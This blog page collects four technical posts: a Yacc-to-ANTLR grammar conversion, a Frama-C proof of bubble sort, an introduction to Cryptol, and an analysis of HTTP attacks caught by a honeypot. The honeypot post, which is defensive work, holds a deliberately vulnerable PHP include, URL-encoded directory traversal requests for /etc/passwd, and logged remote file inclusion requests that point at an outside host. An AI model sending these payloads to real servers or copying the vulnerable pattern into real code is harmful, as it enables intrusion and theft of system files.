From LALR(1) to LL(k)

2 04 2011

I, Pedro Faria and Jose Pedro Silva have been working on a LALR to LL conversor. Our idea was to discover the problems involved in this type of automatic conversion.
Our main goal here was to receive an LALAR(1) grammar and produce an LL(k) one. As a test case we receive an Yacc and produce ANTLR.
For the purpose of testing we used the LogoLISS grammar, a language inspired in LOGO programming language and developed in my university to school grammars and program transformation.

The main Yacc grammar was kind of a big one, here it is:

Liss            : PROGRAM IDENT '{' Body '}'
                ;
Body            : DECLARATIONS Declarations
                     STATEMENTS Statements
                ;
Declarations    : Declaration
                | Declarations Declaration
                ;
Declaration     : Variable_Declaration
                ;
Variable_Declaration : Vars SETA Type ';'
                     ;
Vars        : Var
            | Vars ',' Var
            ;
Var         : IDENT Value_Var
            ;
Value_Var   :
            | '=' Inic_Var
            ;
Type        : INTEGER
            | BOOLEAN
            | ARRAY SIZE NUM
            ;
Inic_Var    : Constant
            | Array_Definition
            ;
Constant    : '(' Sign NUM ')'
            | TRUE
            | FALSE
            ;
Sign        :
            | '+'
            | '-'
            ;
Array_Definition  : '[' Array_Initialization ']'
                  ;
Array_Initialization  : Elem
                      | Array_Initialization ',' Elem
                      ;
Elem        : Sign NUM
            ;
Statements      : Statement
                | Statements Statement
                ;
Statement   : Turtle_Commands
            | Assignment
            | Conditional_Statement
            | Iterative_Statement
            ;
Turtle_Commands  : Step
                 | Rotate
                 | Mode
                 | Dialogue
                 | Location
                 ;
Step     : FORWARD Expression
         | BACKWARD Expression
         ;
Rotate   : RRIGHT
         | RLEFT
         ;
Mode     : PEN UP
         | PEN DOWN
         ;
Dialogue : Say_Statement
         | Ask_Statement
         ;
Location : GOTO NUM ',' NUM
         | WHERE '?'
         ;
Assignment      : Variable '=' Expression
                ;
Variable        : IDENT Array_Acess
                ;
Array_Acess     :
                | '[' Single_Expression ']'
                ;
Expression      : Single_Expression
                | Expression Rel_Op Single_Expression
                ;
Single_Expression  : Term
                   | Single_Expression Add_Op Term
                   ;
Term        : Factor
            | Term Mul_Op Factor
            ;
Factor      : Constant
            | Variable
            | SuccOrPred
            | '(' '!' Expression ')'
            | '(' '+' Expression ')'
            | '(' '-' Expression ')'
            | '(' Expression ')'
            ;
Add_Op      : '+'
            | '-'
            | OU
            ;
Mul_Op      : '*'
            | '/'
            | E
            | MULTMULT
            ;
Rel_Op      : IGUAL
            | DIF
            | '<'             | '>'
            | MENORIGUAL
            | MAIORIGUAL
            | IN
            ;
SuccOrPred  : SuccPred IDENT
            ;
SuccPred    : SUCC
            | PRED
            ;
Say_Statement  : SAY '(' Expression ')'
               ;
Ask_Statement  : ASK '(' STRING ',' Variable ')'
               ;
Conditional_Statement : IfThenElse_Stat
                      ;
Iterative_Statement : While_Stat
                    ;
IfThenElse_Stat     : IF Expression THEN '{' Statements '}' Else_Expression
                    ;
Else_Expression     :
                    | ELSE '{' Statements '}'
                    ;
While_Stat     : WHILE '(' Expression ')' '{' Statements '}'
               ;

This is a toy grammar to help students to understand and get a deep knoledge of some fundamental types of productions in grammars.
The kind of texts this grammar is able to analyse are:

PROGRAM logolissExample {
    DECLARATIONS
    x = (100) , y -> Integer ;
    z -> Boolean ;
    w = TRUE -> Boolean ;
    STATEMENTS
        FORWARD x
        RRIGHT
        y = (100)
        FORWARD e
        RRIGHT
        x = x - (100) + (20)
        FORWARD x + (100)
        RRIGHT
        FORWARD (100)
}

Rules

After some time thinking about this problem we tried to solve the left recursion problem. ANTLR does not know how to handle with left recursion, so we must use the EBNF support to translate this productions.

Grammar rules in BNF provide for concatenation and choice but no specific operation equivalent to the * of regular expressions are provided. In Yacc the only way we get repetition is using the following pattern:

A : A a | a ;

We call this kind of rules a left recursive rule.

So, we discover this two generalized rules to remove left recursion in Yacc grammars (click on the image to expand):

\begin{tabular}{|l|l|c|}\hline\textbf{LALR (BNF)} & \textbf{LL (EBNF)} & Nome da Regra\\\hline\begin{tabular}{ccl}vars & : & var\\& | & vars a b c d e \ldots\end{tabular}&\begin{tabular}{ccl}vars & : & var (a b c d e \ldots)+\end{tabular}&removeLeftRecursionPlusExt\\\hline\begin{tabular}{ccl}vars & : & \\&| & vars a b c d e \ldots\end{tabular}&\begin{tabular}{ccl}vars & : & (a b c d e \ldots)*\end{tabular}&removeLeftRecursionTimesExt\\\hline\end{tabular}

Implementation

So, we start right over the implementation of the conversor. We used Yapp because lately we have been using a lot of Perl, so we are want to get deeper into Perl packages.

We start to implement the definition of a Yacc grammar in Yapp:

productions : production             
            | productions production 
            ;
production  : nonTerminal ':' derivs ';' 
            ;
derivs      : nts            
            | derivs '|' nts 
            |
            ;
nts         : nt     
            | nts nt 
            ;
nt          : terminal    
            | nonTerminal 
            | sep         
            ;
terminal    : STRING_TERMINAL     
            ;
nonTerminal : STRING_NON_TERMINAL
            ;
sep         : SEPARATOR 
            ;

And we move along to represent this information in a structure. We chose an peculiar structure to help us processing it.
This is the structure defined as Haskell types:

type Grammar = [Production]
type Production = HashTable ProductionName [Derivation]
type Derivation = [HashTable NTS Type]
type Type = String
type NTS = String

Easy to find stuff, easy to implement in Perl 🙂
So, this is our Yapp grammar again but this time with semantic actions:

productions : production             { return $_[1]; }
            | productions production {
                                       push @{$_[1]},@{$_[2]};
                                       return $_[1];
                                     }
            ;

production  : nonTerminal ':' derivs ';' { return [ { $_[1] => $_[3] } ]; }
            ;

derivs      : nts            { return [$_[1]]; }
            | derivs '|' nts {
                               push @{$_[1]},$_[3];
                               return $_[1];
                             }
            |                { return [[ { 'epsilon' => 'epsilon' } ]]; }
            ;
nts         : nt     { return $_[1]; }
            | nts nt {
                       push @{$_[1]},@{$_[2]};
                       return $_[1];
                     }
            ;
nt          : terminal    {
                            return [ { $_[1] => 'terminal' } ];
                          }
            | nonTerminal {
                            return [ { $_[1] => 'nonTerminal' } ];
                          }
            | sep         {
                            return [ { $_[1] => 'sep' } ];
                          }
            ;
terminal    : STRING_TERMINAL     {
                                    return $_[1];
                                  }
            ;
nonTerminal : STRING_NON_TERMINAL {
                                    return $_[1];
                                  }
            ;
sep         : SEPARATOR           {
                                    return $_[1];
                                  }
            ;

After we had this structure filled in we applied the two rules shown before and we get rid of left recursion for good.

So, after we process the following grammars with our transformer:

a   : a B C
    | //nothing
    ;
expr : expr "+" expr
     | expr "-" expr
     | expr "*" expr
     ;

We get:

a   : (B C)*
    ;
expr : ( "+" expr)+
     | ( "-" expr)+
     | ( "*" expr)+
     ;

You can see all the code produced (including makefiles) in my github repo.

Other rules

We have noticed that only removing the left recursion makes this grammar work in ANTLR.
We are aware that to fully convert an LALR grammar to LL we need one other step: Left Factoring.

Because our LL system is k-token lookahead we does not have to mind about ambiguous grammars.
Examples like this are not a problem for our destination system.

expr: T A B
    | T C D
    ;

However if our destination grammar was LL(1) we needed to convert this to it’s EBNF form.

Lexer

We also translated the Lex used in flex to ANTLR. The main problem here is that we used only matching functions in Perl and we do not used any grammar for this effect.
The main problem is that the regular expressions in flex are different to regexps in ANTLR.
You can see the Perl code for yourself here.
But you if you want to do a translation from flex to ANTLR better you define a flex grammar.





Correct sorting with Frama-C and some thoughts on Formal Methdos

12 02 2011

A couple of years ago, during my masters on Formal Methods I have been working with automatic provers and I also used Frama-C, this is a tool that allow the user to prove C code directly in the source code, using a special notation in the comments, called ACSL notation.

Frama-C allows you to make two kinds of proofs, security and safety ones. The safety ones are related with arrays index out of bounds access, and so. This kind of proofs are related to the language itself and they are easy to do if you use loop invariants, pre and post conditions.
If you use a high level language, like JAVA you won’t have almost none safety problems.
Because C is too close to machine level code, we can do things that we do not intend (or maybe we do and we use C exactly because it allows this kind of things). For example:

// foo.c file
#include <stdio.h>

int main() {
    char *a = "I like you";
    char *b = "I hate you";
    
    if(&a < &b) a = *(&a + 1); 
    else        a = *(&a - 1); 

    printf("%s\n", a); 
}

As you can see, I never used the b variable for nothing, just have declared it. And the result is:

[ulissesaraujocosta@maclisses:c]-$ gcc -o foo foo.c 
[ulissesaraujocosta@maclisses:c]-$ ./foo
I hate you

This lack of security of language C is one of the reasons we need to write safety statements. Of course this kind of things is why C is so fast and powerful, the person in charge is always the programmer. If you are interested in this kind of tricks and want to understand more about this and smashing the stack and so, feel free to read more posts in my blog about this subject.

The other kind of statements (security ones) are related to the functionality of the program and that’s basically where the problem or the effort is, I will talk about this later on. First let’s see the algorithm and the implementation in C.

Code

The algorithm I use here is just a simple example. I used bubble sort, this is a sort algorithm not very efficient, but it uses none more memory then the needed to store the structure you want to sort.
To get a visual understanding of the algorithm (and to see it inefficiency) check out this youtube video.

This is the implementation of the algorithm:

void swap(int *i, int *j) {
    int tmp = *i;
    *i = *j;
    *j = tmp;
}

void bubbleSort(int *vector, int tam) {
    int j, i;
    j = i = 0;
    for(i=0; i<tam; i++) {
		for(j=0; j<tam-i-1; j++) {
            g_swap = 0;
            if (vector[j] > vector[j+1]) {
                swap(&vector[j],&vector[j+1]);
            }
        }
    }
}

Pre, Post conditions and thinking formally

So, as you can see in the video (or in the code) the algorithm is pretty much simple, we pick the i element cross the array n times and for each element we compare with i, this n times.

We have as pre conditions: The size of the vector must be greater than zero, and all the positions in that vector exists, so in Frama-C we use the valid\_range(vector, i, j), where i and j are indexes of the vector to say that all elements exist.

tam > 0

valid\_range(vector,0,tam-1)

Ans as pos conditions we must ensure that the array is sorted ( I will talk predicate this later).
You may think that this by itself is enough to make a complete proof, but you are wrong. Image that my function clear all the elements in the array and fill the array with \{1,2,..,tam\}, our code will be proved and its wrong!

So, we need to say more… First thing that can pop to your head is OK, we will say that we have the same numbers in the beginning and in the end and you write this:
\forall_a : 0 \leq a < tam : (\exists_b : 0 \leq b < tam : old(vector(b)) \equiv vector(a))

In fact this is closer (not yet right), imagine that you give as input:
\{4,7,9,1,0,3,4\}. If your code returns \{0,1,3,4,7,9\} (we miss the repeated 4) the code will be proved.
So, the solution if to make a Permut predicate and prove for the multi set.
So, this are the post conditions:

sorted(vector,0,tam-1)

Permut\{Old,Here\}(vector,0,tam-1);

Frama-C is so cool because for example at the pos condition if we want to refer to the state in the beginning (before call the function) we use Old and if we want to refer to the moment after the call we heave the Here keyword, remember we are at the post condition, so this wil be executed in the end (so Here means the end of the function call).

Predicates

So, here is the Sorted predicate. Predicates receive a state L and the parameters (just like a function) and they return bool values (true or false). Inside we use regular ACSL notation. Here I define that for an array to be sorted each element must be less or equal to the next one.

/*@ predicate Sorted{L}(int a[], integer l, integer h) =
  @   \forall integer i; l <= i < h ==> a[i] <= a[i+1];
  @*/

The Permut is defined inductively, so we receive two states L1 and L2 and the array a and the range where we want to permute.
We write multiple rules for the permutation, reflection, symmetry, transitivity and finally the most important one, the Swap. So basically here we say that a permutation is a set of successive swaps.

/*@ inductive Permut{L1,L2}(int a[], integer l, integer h) {
  @  case Permut_refl{L}:
  @   \forall int a[], integer l, h; Permut{L,L}(a, l, h) ;
  @  case Permut_sym{L1,L2}:
  @    \forall int a[], integer l, h;
  @      Permut{L1,L2}(a, l, h) ==> Permut{L2,L1}(a, l, h) ;
  @  case Permut_trans{L1,L2,L3}:
  @    \forall int a[], integer l, h;
  @      Permut{L1,L2}(a, l, h) && Permut{L2,L3}(a, l, h) ==>
  @        Permut{L1,L3}(a, l, h) ;
  @  case Permut_swap{L1,L2}:
  @    \forall int a[], integer l, h, i, j;
  @       l <= i <= h && l <= j <= h && Swap{L1,L2}(a, i, j) ==>
  @     Permut{L1,L2}(a, l, h) ;
  @ }
  @
  @ predicate Swap{L1,L2}(int a[], integer i, integer j) =
  @      \at(a[i],L1) == \at(a[j],L2)
  @   && \at(a[j],L1) == \at(a[i],L2)
  @   && \forall integer k; k != i && k != j ==> \at(a[k],L1) == \at(a[k],L2);
  @*/

So, as you can see the bubble sort function itself have 18 lines of code, and in the end with the annotations for the proof we end with 90 lines, but we proved it!

Thoughts

My main point here is to show the thinking we need to have if we want to prove code in general. Pick what language you want, this is the easiest way you will have to prove software written in C. Sometimes if your functions are too complex you may need to prove it manually. The problem is not on the Frama-C side, Frama-C only generates the proof obligations to feed to automatic provers, like Yices, CVC3, Simplify, Z3, Alt-Ergo and so.

My point here is to show the cost of proving software. Proving software, specially if the language is too low level (like C – you need to care about a lot more things) is hard work and is not easy to a programmer without theoretical knowledge.
On the other side, you end up with a piece of software that is proved. Of course this proof is always requirements oriented, ny that I mean: if the requirements are wrong and the program is not doing what you expect the proof is along with that.
I do not stand to proof of all the code on the planet, but the proper utilization of FM (formal methods) tools for critical software.

I steel been using Frama-C since I learned it in 2009, nowadays I use it for small critical functions (because I want, I’m not encouraged to do so) and I have to say that the use of FM in the industry is far. As I told you Frama-C is the easiest automatic proof tool you will find at least that I know.

Talking with Marcelo Sousa about the use of FM in industry, we came to the conclusion that the people that are making this kind of tools and have the FM knowledge don’t make companies. I think if more brilliant people like John Launchbury make companies, definitely FM will be more used.

Source code

Here is all the code together if you want to test it:

// #include <stdio.h>

/*@ predicate Sorted{L}(int a[], integer l, integer h) =
  @   \forall integer i; l <= i < h ==> a[i] <= a[i+1];
  @
  @ predicate Swap{L1,L2}(int a[], integer i, integer j) =
  @      \at(a[i],L1) == \at(a[j],L2)
  @   && \at(a[j],L1) == \at(a[i],L2)
  @   && \forall integer k; k != i && k != j ==> \at(a[k],L1) == \at(a[k],L2);
  @*/

/*@ inductive Permut{L1,L2}(int a[], integer l, integer h) {
  @  case Permut_refl{L}:
  @   \forall int a[], integer l, h; Permut{L,L}(a, l, h) ;
  @  case Permut_sym{L1,L2}:
  @    \forall int a[], integer l, h;
  @      Permut{L1,L2}(a, l, h) ==> Permut{L2,L1}(a, l, h) ;
  @  case Permut_trans{L1,L2,L3}:
  @    \forall int a[], integer l, h;
  @      Permut{L1,L2}(a, l, h) && Permut{L2,L3}(a, l, h) ==>
  @        Permut{L1,L3}(a, l, h) ;
  @  case Permut_swap{L1,L2}:
  @    \forall int a[], integer l, h, i, j;
  @       l <= i <= h && l <= j <= h && Swap{L1,L2}(a, i, j) ==>
  @     Permut{L1,L2}(a, l, h) ;
  @ }
  @*/

/*@ requires \valid(i) && \valid(j);
  @ //assigns *i, *j; //BUG 0000080: Assertion failed in jc_interp_misc.ml
  @ ensures \at(*i,Old) == \at(*j,Here) && \at(*j,Old) == \at(*i,Here);
  @*/
void swap(int *i, int *j) {
    int tmp = *i;
    *i = *j;
    *j = tmp;
}

/*@ requires tam > 0;
  @ requires \valid_range(vector,0,tam-1);
  @ ensures Sorted{Here}(vector, 0, tam-1);
  @ ensures Permut{Old,Here}(vector,0,tam-1);
  @*/
void bubbleSort(int *vector, int tam) {
    int j, i;
    j = i = 0;
    //@ ghost int g_swap = 0;

  /*@ loop invariant 0 <= i < tam;
    @ loop invariant 0 <= g_swap <= 1;
    //last i+1 elements of sequence are sorted
    @ loop invariant Sorted{Here}(vector,tam-i-1,tam-1);
    //and are all greater or equal to the other elements of the sequence.
    @ loop invariant 0 < i < tam ==> \forall int a, b; 0 <= b <= tam-i-1 <= a < tam ==> vector[a] >= vector[b];
    @ loop invariant 0 < i < tam ==> Permut{Pre,Here}(vector,0,tam-1);
    @ loop variant tam-i;
    @*/
    for(i=0; i<tam; i++) {
      //@ ghost g_swap = 0;
      /*@ loop invariant 0 <= j < tam-i;
        @ loop invariant 0 <= g_swap <= 1;
        //The jth+1 element of sequence is greater or equal to the first j+1 elements of sequence.
        @ loop invariant 0 < j < tam-i ==> \forall int a; 0 <= a <= j ==> vector[a] <= vector[j+1];
        @ loop invariant 0 < j < tam-i ==> (g_swap == 1) ==> Permut{Pre,Here}(vector,0,tam-1);
        @ loop variant tam-i-j-1;
        @*/
		for(j=0; j<tam-i-1; j++) {
            g_swap = 0;
            if (vector[j] > vector[j+1]) {
                //@ ghost g_swap = 1;
                swap(&vector[j],&vector[j+1]);
            }
        }
    }
}

/*@ requires \true;
  @ ensures \result == 0;
  @*/
int main(int argc, char *argv[]) {
    int i;
    int v[9] = {8,5,2,6,9,3,0,4,1};

    bubbleSort(v,9);

//     for(i=0; i<9; i++)
//         printf("v[%d]=%d\n",i,v[i]);

    return 0;
}

If you are interested in the presentation me and pedro gave at our University, here it is:





Cryptol the language of cryptography

1 04 2009

Pedro Pereira and I are working on a new project in the Masters. The second half of the Masters is composed of a single project suggested by a company. Some companies are forming partnerships in the Masters formal methods, including: the Critical software, SIG and Galois. We chose the Galois because we also are in the area of cryptography and we already knew some work of some people from this company.

The project suggested by Galois was study the Cryptol as a language of specification of cryptographic algorithms. The cipher we used for this study is the SNOW 3G (The SNOW website), later on I will talk about the specification of this cipher. In this post I am only interested to show the language.

I’m going to show you some details about the language. This post is not intend to be a exhaustive explanation of Cryptol, if you looking for that you can go directly to the manuals. This post only relates my experience, and what I like it most with the language.

Overview

Cryptol is a high-level language that is geared to deal with low-level problems. Is a Domain-specific language to design and implement cryptographic algorithms.
This language has a high percentage of correctness of the implementation of a cipher, because it implements type inference, so we can say that a big part of the language implements correctness. This correctness is also achieved thanks to the architecture of the language – functional. We don’t have side effects – a function only return something inside is codomain.
In Cryptol we have this philosophy that says that everything is a sequence. This is very useful because we are working with low level data (array of bits), so we use sequences to represent that arrays. We can have nested sequences to have a more structured representation of data. For example, we can simply transform a 32-bit sequence in a 4 1-byte sequence.
The size of this sequences could be implemented as finite or infinite, as we going to see later in this post. Because Cryptol is a high-level language we can also implement polymorphic functions, most of the primitive functions are implemented in polymorphic mode. The way we have to navigate throw the sequences is using recursion, or sequences comprehension, and with these two techniques we can implement recurrences.

If you are a Haskell programmer you just need the next section to learn Cryptol. This language is so look a like with Haskell that even the philosophy seems to have a lot in commune.

Types in Cryptol

The type [32] means that you have a sequence of 32-bit size. All the types in Cryptol are size oriented. The unit is the Bit, that you can use to represent Bool. To represent a infinite sequence we use the reserved word inf, and we write: [inf] to represent that.

If you want to generate a infinite sequence, we use the syntactic sugar of the sequences like that: [1~..]. Cryptol will infer this sequence as type

[1~..]~:~[inf][1]

That means this sequence have infinite positions of 1-bit words. The type inference mechanism will always optimize the size that he needs, to represent the information.
So, it infer the type of [100~..] as:

[100~..]~:~[inf][7]

Because, it “knows” that needs only 7-bits to represent the decimal 100. But if you need more, you can force the type of your function.
We implement polymorphism in our types, if we have:

f~:~[a]b~\rightarrow~[a]b

This means, that the function f have polymorphism over b, because we say that it domain is one sequence of size a of type b, and it codomain also. Here we could also see: f~:~[a][b]c meaning that f is a constant of sequences of size b of type c, a times.

So, lets talk about some primitive functions in Cryptol, and its types. The tail function have the following type in Cryptol:

tail~:~\{a~b\}~[a+1]b~\rightarrow~[a]b

As we can see, Cryptol is so size oriented, that we can use arithmetic operators in types. We can probably infer what this function does just from it type: tail works for all a and b such that if we have one sequence os size a+1 of type b it returns one sequence of size a of same type. In fact this function removes the first element of one sequence.

Because of this size oriented philosophy a lot of functions, that change the size of the sequences can be read just from the type.

As you can see in the following list of Cryptol primitive function:

drop~:~\{ a~b~c \}~( fin~a ,~a~\geq~0)~\Rightarrow~(a ,[ a + b ]~c )~\rightarrow~[ b ]~c
take~:~\{ a~b~c \}~( fin~a ,~b~\geq~0)~\Rightarrow~(a ,[ a + b ]~c )~\rightarrow~[ a ]~c
join~:~\{ a~b~c \}~[ a ][ b ] c~\rightarrow~[ a * b ]~c
split~:~\{ a~b~c \}~[ a * b ] c~\rightarrow~[ a ][ b ]~c
tail~:~\{ a~b \}~[ a +1] b~\rightarrow~[ a ]~b

Recursion and Recurrence

Cryptol implements Recursion, just like a lot of functional languages do.

Imagine the fibonacci function definition:

It implementation in Crytol is exactly the same as defined mathematically.

fib : [inf]32 -> [inf]32;
fib n = if n == 0 then 0 else if n == 1 then 1 else fib (n-1) + fib (n-2);

Cryptol uses recursion to permit us to iterate throw sequences.

But, If you prefer you can implement a more functional algorithm of fibonacci function in Cryptol:

fib : [inf]32 -> [inf]32;
fib n = fibs @ n;
   where {
      fibs : [inf]32;
      fibs = [0 1] # [| x + y || x <- drop (1,fibs) || y <- fibs |];
   };

Here, as you can see, we define a infinite list fibs of all the fibonacci numbers, by calling the fibs inside the sequences comprehension fibs, this is called a recurrence, and you can use that too in Cryptol.

Cryptol vs C

I’m going to show you some part of the implementation of SNOW 3G in C. This is a function called MUL_{\alpha}

MULa : [8] -> [32];
MULa(c) = join ( reverse [
   ( MULxPOW(c, 23 :[32], 0xA9) )
   ( MULxPOW(c, 245:[32], 0xA9) )
   ( MULxPOW(c, 48 :[32], 0xA9) )
   ( MULxPOW(c, 239:[32], 0xA9) ) ] );
/* The function MUL alpha.
    Input c: 8-bit input.
    Output : 32-bit output.
    See section 3.4.2 for details.
 \*/
u32 MULalpha(u8 c) {
 return
  ((((u32)MULxPOW(c,23, 0xa9)) << 24 ) |
  (((u32)MULxPOW(c, 245,0xa9)) << 16 ) |
  (((u32)MULxPOW(c, 48,0xa9)) << 8 ) |
  (((u32)MULxPOW(c, 239,0xa9)))) ;
}

You can see that in Cryptol we just say that we want to work with a 32-bit word, and we don’t need to do any shift to our parts of the word. We just join them together. We reverse the sequence, because Cryptol stores words in little-endian, and we want to keep the definition like the specification.

This is a very simple function, so the result in C is not so that different. But if we have a more complex function, we were going to start having a nightmare to write that in C.

Conclusion

Well, the conclusion is that Cryptol is a language that really help to write low-level algorithms. With Cryptol the specification is formal and easier to read than other languages. A value of Cryptol is that the code can be converted to other languages, such as VHDL and C.

If you’re interested, take a look at the presentation that we did.

References





HTTP attacks

23 01 2009

In this post I will talk about the HTTP results that I collected from the experience with one honeypot.
As you may know, I’ve been putting one honeypot running for 5 weeks. I’ve previously talked about SMTP and SSH attacks, now is the time for HTTP. This service (port 80) is by far the most fustigated service in the honeypot. And make sense, in this port we can have a lot of Web services with a lot of exploitable code running…

This chart represents the number of hit’s in the port 80, that our honeypot had during his activity:

Open Proxy’s

An open proxy is like an Open mail relay, described in SMTP attacks. Anyone in the internet can use this systems to reduce their using of the bandwidth. For example, if an open proxy is located in your country, and if your internet provider only allow you to access web pages of your country, you can use this systems to visit outside pages.
The process is quite simple, if you are under a proxy and you want a web page, the proxy go get them for you and send that to you. All the traffic and effort was made by the proxy. Is just like a forwarding service.

Here at the University we have one closed proxy, and that is great, because a lot of pages are in cache, so even we have a 1Gb connection, the proxy don’t need to get the page we want, because have it in the cache.

webcollage/1.135a

The webcollage is a program that seeks the Internet images and composes them in a window. Some have described as a pop culture program. This program makes random web searches and extract the images of the results.

There was a host that has make some hit’s in our honeypot’s, as we can see in the following extract from the file web.log:

--MARK--,"Mon Dec 15 23:09:00 WET 2008","IIS/HTTP","92.240.68.152","192.168.1.50",56886,80,
"GET http://www.morgangirl.com/pics/land/land1.jpg HTTP/1.0
User-Agent: webcollage/1.135a
Referer: http://random.yahoo.com/fast/ryl
Host: www.morgangirl.com
",
--ENDMARK--

The interesting here is that this agent is trying to get an image using our honeypot as a open proxy. The possibilities is that our honeypot as been seen by a proxy scanner in the past that have add our honeypot to an open proxy list.

Solution

We can do something, if this had happened for real. We can block the IP that made the request (92.240.68.152) to avoid future requests by this host. But the problem is not from this person who is using a program to get the images. The problem here is that we are targeted as an open proxy, and probably in the future we will be asked again to get some file.

A more comprehensive solution is to block all the requests made from this program. Adding this lines to the file “.htaccess” in the folder.

# Start of .htaccess change.
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^webcollage
RewriteRule ^.*$ - [F]
# End of .htaccess change.

This won’t prevent all the attempts to use our server as open proxy, but will prevent all the requests made by this program.

Directory traversal

A directory traversal attacks intend to exploit insufficient security validation of user-supplied input file names. The main objective of this attack is gain access to a computer file that is not intended to be accessible.

I will give you the Wikipedia example:
Imagine you have this PHP script running in your server, and this page have the name vulnerable.php:

<?php
$template = 'blue.php';
if ( isset( $_COOKIE['TEMPLATE'] ) )
   $template = $_COOKIE['TEMPLATE'];
include ( "/home/users/phpguru/templates/" . $template );
?>

If someone send you this request:

GET /vulnerable.php HTTP/1.0
Cookie: TEMPLATE=../../../../../../../../../etc/passwd

Your server will return your /etc/passwd file, in the response:

HTTP/1.0 200 OK
Content-Type: text/html
Server: Apache

root:fi3sED95ibqR6:0:1:System Operator:/:/bin/ksh 
daemon:*:1:1::/tmp: 
phpguru:f8fk3j1OIf31.:182:100:Admin:/home/users/phpguru/:/bin/csh

We have seen a lot of variations of this attack, as will show you after.

On 4 January 2009 dozens of hit’s were made from Lelystad, The Netherlands. These hit’s were performed to verify if our HTTP server allow directory traversal, to get the file /etc/passwd by the attacker.

In this case, the attacker wanted to acquire the /etc/passwd to perhaps have a list of the users that can access to the system. To possibly get access through any of them.

This type of attack is usually done not asking directly for the file through its conventional path, but in an encrypted way (using exa characters). With that variations it is more unlikely that the application perform validations on what the attacker wants.
Unfortunately our honeypot, not saved the log file’s during the day January 1 until 4, so we only can see in the other’s log’s the activity performed by this host. We cannot show the number of hit’s of this IP in day 4.
In the following listings I will show the pairs of command that the attacker wanted to do and the package that came to our honeypot.

GET ../../../../../../../../../../etc/passwd HTTP/1.1
--MARK--,"Sun Jan  4 05:20:57 WET 2009","IIS/HTTP","82.173.198.254","192.168.1.50",59706,80,
"GET %2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd HTTP/1.1
User-Agent: Nmap NSE
Connection: close
Host: 82.155.127.187
",
--ENDMARK--
GET .../../../../../../../../../../etc/passwd HTTP/1.1
--MARK--,"Sun Jan  4 05:20:58 WET 2009","IIS/HTTP","82.173.198.254","192.168.1.50",59711,80,
"GET %2E%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd HTTP/1.1
User-Agent: Nmap NSE
Connection: close
Host: 82.155.127.187
",
--ENDMARK--
GET ../../../../../../../../../../etc/passwd HTTP/1.1
--MARK--,"Sun Jan  4 05:21:02 WET 2009","IIS/HTTP","82.173.198.254","192.168.1.50",59727,80,
"GET %2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2Fetc%5C%2Fpasswd HTTP/1.1
User-Agent: Nmap NSE
Connection: close
Host: 82.155.127.187
",
--ENDMARK--
GET ....................etcpasswd HTTP/1.1
--MARK--,"Sun Jan  4 05:21:04 WET 2009","IIS/HTTP","82.173.198.254","192.168.1.50",59740,80,
"GET %2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5Cetc%5Cpasswd HTTP/1.1
User-Agent: Nmap NSE
Connection: close
Host: 82.155.127.187
",
--ENDMARK--
GET //etc/passwd HTTP/1.1
--MARK--,"Sun Jan  4 05:20:59 WET 2009","IIS/HTTP","82.173.198.254","192.168.1.50",59700,80,
"GET %2F%2Fetc%2Fpasswd HTTP/1.1
User-Agent: Nmap NSE
Connection: close
Host: 82.155.127.187
",
--ENDMARK--

Conclusion

Possibly an attacker trying to do this in a real server would get the file he wanted, but our honeypot was not prepared to
respond to such attacks, and it only responds with a message 302:

HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
P3P: CP='ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI'
Date: Sab Jan 10 21:46:17 WET 2009
Content-Type: text/html
Connection: close
Accept-Ranges: bytes
Set-Cookie: isHuman=Y; path=/
Set-Cookie: visits=1; expires=; path=/
Set-Cookie: ASPSESSIONIDCBBABCDC=DEADBEDFBDFCCEBBBA; path=/
Expires: Sab Jan 10 21:46:17 WET 2009
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://bps-pc9.local.mynet/">here</a>.</body>

We can conclude that the requests that were sent to our honeypot mean that the attacker was using the NSE, which means nmap scripting engine. This is a tool that comes with nmap.
Allows the user to write scripts to automate various tasks in the network.

Here we can see the script that was used to perform this attack.

Morfeus Fucking Scanner (MFS)

MFS is a scanner that search web pages with PHP vulnerabilities. This scanner has a large number of tests for known vulnerabilities in PHP scripts. Then we show some of those applications that MFS search for vulnerabilities.

WebCalendar

The WebCalendar is a web calendar that can be used by one or more users, it is possible to create groups with calendars and it supports a wide range of databases.
This application uses several PHP files, one of those id send_reminder.php that contained serious vulnerabilities, one of which allowed the inclusion of remote files through variable “includedir” that was not validated. So anyone can add whatever he want on this page.

We found that this vulnerability only affects WebCalendar version 1.0.4, this application has now in version 1.2.
While our honeypot not have this application installed, although there were made some attempts to attacks on this application, two of them over the vulnerability of this file, as the log show’s.

--MARK--,"Wed Dec 24 16:07:29 WET 2008","IIS/HTTP","74.52.10.34","192.168.1.50",54941,80,
"GET /webcalendar/tools/send_reminders.php?noSet=0&includedir=http://217.20.172.129/twiki/a.gif?/ HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Morfeus Fucking Scanner
Host: 82.155.248.190
Connection: Close
",
--ENDMARK--
--MARK--,"Wed Dec 24 16:07:30 WET 2008","IIS/HTTP","74.52.10.34","192.168.1.50",55003,80,
"GET /calendar/tools/send_reminders.php?noSet=0&includedir=http://217.20.172.129/twiki/a.gif?/ HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Morfeus Fucking Scanner
Host: 82.155.248.190
Connection: Close
",
--ENDMARK--

This scanner (MFS) scans a list of hosts and attempts to link up several times until the server be attacked.
In our case this type of request on port 80 only returns a 404 error.

The gif file that the attacker wants to include just print a message:

echo (" Morfeus hacked you ");

Conclusion

